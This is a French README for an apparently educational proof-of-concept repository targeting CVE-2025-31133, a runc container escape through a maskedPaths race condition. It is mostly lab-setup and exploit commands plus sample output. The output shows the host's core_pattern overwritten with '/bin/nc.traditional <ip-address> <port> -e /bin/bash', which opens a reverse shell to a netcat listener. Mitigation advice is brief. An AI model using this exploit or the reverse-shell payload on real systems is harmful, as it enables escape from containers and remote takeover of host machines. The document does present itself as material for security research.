
Proof-of-concept éducatif pour CVE-2025-31133, une évasion de conteneur runc via une condition de concurrence sur maskedPaths. Comprend un laboratoire, un script d'exploitation et des conseils d'atténuation pour les chercheurs en sécurité.
Un environnement de démonstration et d'apprentissage de preuve de concept pour CVE-2025-31133, une vulnérabilité de sécurité dans runc qui permet de contourner la protection maskedPaths via une condition de concurrence. Les maskedPaths sont conçus pour empêcher les conteneurs d'accéder aux chemins sensibles du système de fichiers hôte.
https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910
👉 Ce dépôt est un exemple pratique de l'état d'esprit et des techniques de recherche exactes enseignées dans la formation Black Hat :
L'exploit exploite une condition de concurrence où :
maskedPaths pour protéger les fichiers sensibles (par exemple, /proc/sys/kernel/core_pattern)/dev/null) dans le rootfs du conteneurCe dépôt est uniquement à des fins éducatives.
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc
Le script lab-setup.sh va :
chmod +x lab-setup.sh
./lab-setup.sh
Vérifiez que la version vulnérable de runc est installée :
runc --version
Vous devriez voir la version 1.2.0 ou similaire.
nc -lnvp <PORT>
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
En cas de succès, vous devriez voir :
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148: 7068 Segmentation fault (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.
Une connexion reverse shell devrait être établie avec votre écouteur.
Pour se protéger contre cette vulnérabilité :
core_pattern d'origine après une exploitation réussieCe projet est fourni à des fins éducatives. Utilisez-le de manière responsable et éthique.
Rappelez-vous : Utilisez toujours les outils de recherche en sécurité de manière responsable et uniquement dans des environnements que vous possédez ou pour lesquels vous avez une autorisation explicite de test.